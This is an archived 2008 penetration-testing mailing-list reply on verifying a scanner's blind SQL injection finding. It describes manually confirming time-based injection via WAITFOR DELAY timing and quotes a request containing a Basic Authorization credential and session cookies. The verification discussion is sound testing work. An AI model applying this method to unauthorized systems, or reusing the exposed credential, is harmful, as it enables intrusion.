Penetration Testing mailing list archives
Re: Checking for SQL Injection
From: "kevin horvath" <kevin.horvath () gmail com>
Date: Wed, 3 Sep 2008 16:21:07 -0400
Just to clarify when I say delay I meant what the tool is using for a waitfor delay. That is of course if this is what its using for its blind sql injection. so if its using a delay of 10 seconds you should verify by doing the same command and see if you dont get a response until the 10 second delay is over. Also to clarify you need to manually do this multiple times if your doing this over a WAN to make sure latency isnt an issue since this is a time based attack. Good luck. On Wed, Sep 3, 2008 at 4:17 PM, kevin horvath <kevin.horvath () gmail com> wrote:
a couple of points here. It could be using a time based injection (waitfor delay). Its possible that its injecting this into one of the vid parameters but you would need to decode/decrypt these parameters to see (or look at the tool and see what and how its doing its injecting. Its not doing it on the basic authorization so it must be the vid as the injection point. But to verify this you need to know what the delay is and verify that it is working by doing these mulitple times (to take into account any delay over the WAN). So you should do this test manually to see if this is the case. It could also be comparing responses for differences but you need to verify this manually and try your own injection and compare to see if there is any difference (note burp suite is an excellent tool for this). Kevin On Mon, Sep 1, 2008 at 4:35 AM, GT GERONIMO, Frederick Joseph B. <fbgeronimo () globetel com ph> wrote:Hello, I ran a tool to verify if a website had SQL Injection. The tool detected Blind SQL Injection vulnerability. I have pasted the request and response below. Would you say that the tool's evaluation is accurate? Is there anything that the web application can be doing to make this a false-positive? Thanks. HTTP REQUEST ============ GET /prototype03/vulnerable.php?vid=zJrt&act=viewed&page=0.01 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.victim.com Authorization: Basic dTI0Y29tcGg6PCEzIzw3PjlBQnVu Cookie: PHPSESSID=b4499547c0c4f399ba649181d5e67f5c;vid11=6512bd43d9caa6e02c990b0 a82652dca;vid2=c81e728d9d4c2f636f067f89cc14862c;vid4=a87ff679a2f3e71d918 1a67b7542122c;vid8=c9f0f895fb98ab9159f51fd0297e236d;vid9=45c48cce2e2d7fb dea1afc51c7c6ad26;vid7=8f14e45fceea167a5a36dedd4bea2543 Connection: Close Pragma: no-cache HTTP RESPONSE ============= HTTP/1.1 200 OK Date: Fri, 29 Aug 2008 10:00:08 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html This e-mail message (including attachments, if any) is intended for the use of the individual or the entity to whom it is addressed and may contain information that is privileged, proprietary, confidential and exempt from disclosure. If you are not the intended recipient, you are notified that any dissemination, distribution or copying of this communication is strictly prohibited. If you have received this communication in error, please notify the sender and delete this E-mail message immediately. ------------------------------------------------------------------------ This list is sponsored by: Cenzic Top 5 Common Mistakes in Securing Web Applications Get 45 Min Video and PPT Slides www.cenzic.com/landing/securityfocus/hackinar ------------------------------------------------------------------------
------------------------------------------------------------------------ This list is sponsored by: Cenzic Top 5 Common Mistakes in Securing Web Applications Get 45 Min Video and PPT Slides www.cenzic.com/landing/securityfocus/hackinar ------------------------------------------------------------------------
Current thread:
- Re: Checking for SQL Injection, (continued)
- Re: Checking for SQL Injection Serg B (Sep 03)
- RE: Checking for SQL Injection Basha, Arif (Sep 03)
- Re: Checking for SQL Injection Bruno Guerreiro Diniz (Sep 03)
- Re: Checking for SQL Injection david lodge (Sep 10)
- Re: Checking for SQL Injection Glenn Wilkinson (Sep 12)
- Re: Checking for SQL Injection Jorge L. Vazquez (Sep 13)
- Re: Checking for SQL Injection p4ssion (Sep 14)
- RE: Checking for SQL Injection Basha, Arif (Sep 03)
- Re: Checking for SQL Injection Serg B (Sep 03)
- Re: Checking for SQL Injection natron (Sep 03)
- Re: Checking for SQL Injection kevin horvath (Sep 03)